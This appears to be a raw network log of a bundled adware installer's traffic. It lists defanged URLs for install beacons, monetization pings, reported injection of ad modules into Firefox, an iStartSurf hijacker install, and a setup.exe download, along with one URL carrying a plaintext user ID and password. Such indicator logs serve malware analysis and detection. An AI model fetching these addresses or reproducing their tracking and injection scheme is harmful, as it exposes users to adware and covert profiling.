hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16634.ashx?e=eISsn0A7mAY luBT5UotGLi3muUffR3jrMHStbyX7lp4E7mrr1h80riKIFo3W8f23Wq7IsWCDz43mL7KBb4uQ/KiWnlKjT8nmtnRdFSmbGuENvzEMy06jATxIUcsgQ wO1MeTElIgRus2zM3OKTsdhhqfTLLUt3A0w03bJUd6M6gKlGaFWGmKjy7piDl3IHAus3QPIaZe1RJ/9u4mACIykdoRAj2suRrqzK4ONZfy8uwkk WHLaN3BOpzAENMeu5HLnHRSngDc8= 198.232.124.192
hxxp://xa.xingcloud.com/v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.regok 65.255.35.143
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=100&n=init_start_funnel_step_name&rnd=1429400147
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=100&n=init_start_funnel_step_name&rnd=1429400147
hxxp://xa.xingcloud.com/v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.hp 65.255.35.143
hxxp://xa.xingcloud.com/v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.ds 65.255.35.143
hxxp://ipgeoapi.com/ 23.23.123.101
hxxp://download.dynect.mozilla.net/?product=firefox-34.0.5-complete&os=win&lang=en-US
hxxp://rep.shopper-pro.com/app/ping.ashx?e=ZuS0/O3oV2pBhrP9twY3lDDlic64H1m3swOQ QJVkEHykjeeMFQEgOIu4Zx3YXXHbkP33eKXEVDuckMp0VGSOWNPI2OPMQSa8OW8dQbOsF8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy&product=EXTFirefox&rnd=1429400150&it=0&action=Init&text=Ext version: 1.0.0.4. Firefox version: 29.0.1. DB name: database1_0_0.json. DB version: 1.0.1.4 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=ivSYnxWU6cjhuuY8t0g74t8/z1mRXxm3v7giBVAIY12rMrg41l/Ly7CST5Ycto3cE6nMAQ0x67lxVrNxtz1yEbBRuaRLHbXnHR1BOlQeSG TPkAVkd2bb47DCigMuA0x&product=EXTFirefox&rnd=1429400150&it=0&action=Init&text=Ext version: 1.0.0.1. Firefox version: 29.0.1. DB name: yta_database1_0_0.json. DB version: 1.0.0.1 54.197.238.106
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_36&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&mdat=&procstarttime=1429400147&procruntime=3&rnd=1429400150
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=70121&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_32&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&mdat=&procstarttime=1429400147&procruntime=3&rnd=1429400150
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&error=0&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=3&rnd=1429400150
hxxp://rep.shopper-pro.com/app/ping.ashx?e=ZuS0/O3oV2pBhrP9twY3lDDlic64H1m3swOQ QJVkEHykjeeMFQEgOIu4Zx3YXXHbkP33eKXEVDuckMp0VGSOWNPI2OPMQSa8OW8dQbOsF8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy&product=EXTFirefox&rnd=1429400150&it=0&action=Inject&text=JollyWallet 54.197.238.106
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=70121&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&error=0&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=3&rnd=1429400150
hxxp://www.google.com/ 173.194.113.210
hxxp://rep.shopper-pro.com/app/ping.ashx?e=ZuS0/O3oV2pBhrP9twY3lDDlic64H1m3swOQ QJVkEHykjeeMFQEgOIu4Zx3YXXHbkP33eKXEVDuckMp0VGSOWNPI2OPMQSa8OW8dQbOsF8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy&product=EXTFirefox&rnd=1429400150&it=0&action=Inject&text=GoobzoInfo 54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=ZuS0/O3oV2pBhrP9twY3lDDlic64H1m3swOQ QJVkEHykjeeMFQEgOIu4Zx3YXXHbkP33eKXEVDuckMp0VGSOWNPI2OPMQSa8OW8dQbOsF8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy&product=EXTFirefox&rnd=1429400150&it=0&action=Inject&text=DealPly 54.197.238.106
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000805&country=ua&app=70299&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147
hxxp://rep.shopper-pro.com/app/ping.ashx?e=ZuS0/O3oV2pBhrP9twY3lDDlic64H1m3swOQ QJVkEHykjeeMFQEgOIu4Zx3YXXHbkP33eKXEVDuckMp0VGSOWNPI2OPMQSa8OW8dQbOsF8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy&product=EXTFirefox&rnd=1429400150&it=0&action=Inject&text=GeneralInjector 54.197.238.106
hxxp://www.google.com.ua/?gfe_rd=cr&ei=VuoyVdCFJoWFNIS-gOgJ 173.194.113.207
hxxp://a1284.g.akamai.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=200&n=init_end_funnel_step_name&rnd=1429400150
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000171&country=ua&app=70121&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=200&n=init_end_funnel_step_name&rnd=1429400150
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=300&n=deploy_start_funnel_step_name&rnd=1429400151
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=300&n=deploy_start_funnel_step_name&rnd=1429400151
hxxp://online.goobzo.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=1&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=20131113143800&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&XMLUpdateFailed=0&ElapsedTime=1429400151&SBPIDS=1 212.143.22.213
hxxp://test.youtubeaccelerator.com/video_accelerator/wizardtest/SMALLTEST.HTM?random=580526&mode=nolsp 107.20.238.80
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1429400153
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1429400153
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=500&n=deploy_notification_start_funnel_step_name&rnd=1429400153
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=500&n=deploy_notification_start_funnel_step_name&rnd=1429400153
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1429400154
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1429400154
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=700&n=deploy_ch_start_funnel_step_name&rnd=1429400154
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=700&n=deploy_ch_start_funnel_step_name&rnd=1429400154
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=800&n=deploy_nova_start_funnel_step_name&rnd=1429400154
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=800&n=deploy_nova_start_funnel_step_name&rnd=1429400154
hxxp://test.youtubeaccelerator.com/youtube_accelerator/wizardtest/SMALLTEST.HTM?random=583100&mode=nolsp 107.20.238.80
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=900&n=deploy_ff_start_funnel_step_name&rnd=1429400154
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=900&n=deploy_ff_start_funnel_step_name&rnd=1429400154
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=xBG2NTmY QK9KEnyTrgYNCS12lnL SoR3Pumfblmu5B9EKWfiY9Pr9w9nGpQKxy70q Jjl2n6lTqMDSi8JPnXntmD8Dkx2dtxTFIShqYYGTBXl5O1yvgpvbs4KoC9rXoM04b/1V7BRVJIg//0i5Y0yFFDT8zaqXUPiEHC8qKnK0y29LnfOuhHRfPsjAwYrz0BON6bpifNP90ZOR3qDKzNEkiM1XqVHspN5k/xV0ou3jDB1OlY/J/1le8QB0l0RjKYiTJiFZhVM8MhwydMkRQ2QcxqMFWusbg17u1zDN5hWKM8MU7L6Z1XFzslN/Oom5DbE2hSZV1srvsrduYhMMj26C9PLeYwYaPTl2pfP1 VeNlvtdc20PV5GDlNcv2CDURj6Fy3X7tYh7DeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6OkW3dyPfVSTAJ 54.197.238.106
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1429400158
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1429400158
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1429400158
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1429400159
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1429400159
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1429400159
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1429400159
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000805&i=10000&n=deploy_end_funnel_step_name&rnd=1429400159
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1429400161
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=_ffDll_0&app=70299&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_36&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=14&rnd=1429400161
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000171&i=10000&n=deploy_end_funnel_step_name&rnd=1429400161
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1429400147&lifetime=0&silent=1&crtnm=na&procstarttime=1429400147&procruntime=14&rnd=1429400161
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=4&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000805&country=ua&app=70299&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=QHucCbLl /ZRN3UqGh1U L0oSfJOuBg06UlKwaiBj2 MDmRWpWBZ0PxJo1EJGyYRjOluN4MfK81xebCnHQAai QVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlGfaDF4SP6aVUeZLRmueCpr 7rPtSKe/ E4aMYDRhnLflW3vxOK wUbIROPie2z407nXsJR6HRCLBPEhRyyBD7B8meHxUMSBFKVM1FYzK8CTpSqMO4CK Ynib 8lcO8XYbxKtVwphCE/yhsDDHNIJ6TYBMbHlkM59hB5aSy JFSFlAN A2uK7PKHyHmjditetm/6pH veTXixuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJeK7a1soWlgbXd/rihenux9E5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpQUbFx3f954sg== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=QHucCbLl /ZRN3UqGh1U L0oSfJOuBg06UlKwaiBj2 MDmRWpWBZ0PxJo1EJGyYRjOluN4MfK81xebCnHQAai QVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlGfaDF4SP6aVUeZLRmueCpr 7rPtSKe/ E4aMYDRhnLflW3vxOK wUbIROPie2z407nXsJR6HRCLBPEhRyyBD7Baz7/1/hZ7WhxV07ryYCFqgpsddDctmUfB0TiMG7Y7Bjz4pxZKLL7/a0RCgbXs/u1ilv6ykvr0VwgDjjE9zaqiwuDHf6uRePgARB4a3FqO8nwNXKcCcFXyjPDFOy mdVxc7JTfzqJuQ2xNoUmVdbK77K3bmITDI9uOy dZOY5uM7AQhJgQ701L66QyS6DOQJjDeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6OkQ== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=QHucCbLl /ZRN3UqGh1U L0oSfJOuBg06UlKwaiBj2 MDmRWpWBZ0PxJo1EJGyYRjOluN4MfK81xebCnHQAai QVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlGfaDF4SP6aVUeZLRmueCpr 7rPtSKe/ E4aMYDRhnLflW3vxOK wUZAjwe0z3CnlPHRxe7sAHW6KYX3Ti/i3YMgCmKZYKupqeHrSTA7eC3FjPDFOy mdVxc7JTfzqJuQ2xNoUmVdbK77K3bmITDI9uOy dZOY5uM7AQhJgQ701L66QyS6DOQJjDeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6OkQ== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=XOxRKBm2zlySwLUjiBbolQYXFmKEvWT37OXLse4BafTbQC nVTu53mZVsyaCUtL66ks4x 5ewyK5EYBtUaaJ2Vte0h/YpXnsUyuixSI4KbCwH m 6Vr7WDlqmAdRyBaEVR5AawbKoxopJb8t2bI2vNjWo3KgvBPcaACykertHSHI02mIjBnQG1vlbGoI43V0s IILilpWF2ryaFrt1ZytQQr15Tmip 94khRQjb0om5r9iFtppC1uEsoMnuAcfjiugW2mv9tjm0wz0U6I70ghzFcuANGYcshuJ43h3AwCJAKCtNaB71zmlXUgaWWscg8vFDeL0Cq7BkB/XD6IlvHg== 198.232.124.192
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=_ffDll_0&app=70121&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_32&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=16&rnd=1429400163
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=70121&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1429400147&lifetime=0&silent=1&crtnm=na&procstarttime=1429400147&procruntime=16&rnd=1429400163
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=4&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000171&country=ua&app=70121&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147
hxxp://xa.xingcloud.com/v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.nt.ff.tab 65.255.35.143
hxxp://xa.xingcloud.com/v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.finish 65.255.35.143
hxxp://dqoup4b5zs0bi.cloudfront.net/infv5/index/3428/3rd 54.192.47.29
hxxp://dlrkbt247pbk6.cloudfront.net/3428_92a5d683c188790231b1aa2af09de41e/2.pak 54.192.46.211
hxxp://xa.xingcloud.com/v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.wpm 65.255.35.143
hxxp://xa.xingcloud.com/v4/sof-windowspm/?action0=xa.geoip&action1=visit&action2=install&update0=ref,wpmvt&update1=nation,us&update2=language,en 65.255.35.143
hxxp://xa.xingcloud.com/v4/sof-windowspm/?action=visit.heartbeat.wpmvt&update3=version,20.0.0.1953 65.255.35.143
hxxp://xa.xingcloud.com/v4/sof-windowspm/?action=visit.heartbeat.wpmvt 65.255.35.143
hxxp://xa.xingcloud.com/v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.ient 65.255.35.143
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=install_complete&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=istartsurf&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=3&index_in_screen=1&index_in_session=3&0.6547741639866222
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=install_start&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=appshat_madness&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=4&index_in_screen=1&index_in_session=4&0.7184957306003938
hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=100&n=init_start_funnel_step_name&rnd=1429400187
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=65743&appver=0&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_43&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350029&asw=0&asw2=1082139141&asw3=-2147475456&asw4=34816&crtnm=na&mdat=&procstarttime=1429400187&procruntime=2&rnd=1429400189
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=65743&appver=0&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&error=0&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350029&asw=0&asw2=1082139141&asw3=-2147475456&asw4=34816&crtnm=na&procstarttime=1429400187&procruntime=2&rnd=1429400189
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400187&asw=0_1082139141_-2147475456_34816&browser=ff&rnd=1429400187
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=200&n=init_end_funnel_step_name&rnd=1429400190
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=300&n=deploy_start_funnel_step_name&rnd=1429400190
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1429400191
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=500&n=deploy_notification_start_funnel_step_name&rnd=1429400191
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1429400191
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=700&n=deploy_ch_start_funnel_step_name&rnd=1429400192
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=800&n=deploy_nova_start_funnel_step_name&rnd=1429400192
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=900&n=deploy_ff_start_funnel_step_name&rnd=1429400192
hxxp://xa.xingcloud.com/v4/sof-ient/267123711_198339_B48A115F?action0=xa.geoip&action2=visit&update0=ref,smt&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,smt 65.255.35.143
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1429400193
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1429400194
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1429400194
hxxp://xa.xingcloud.com/v4/sof-ient/267123711_198339_B48A115F?action1=install.smt 65.255.35.143
hxxp://up.soft365.com/Fan/rebirth?uid=267123711_198339_B48A115F&ptid=smt&ver=4.0.1.1716&dname=istartsurf 174.36.247.67
hxxp://xa.xingcloud.com/v4/searchprotect/267123711_198339_B48A115F?action0=xa.geoip&action1=visit&action2=install 65.255.35.143
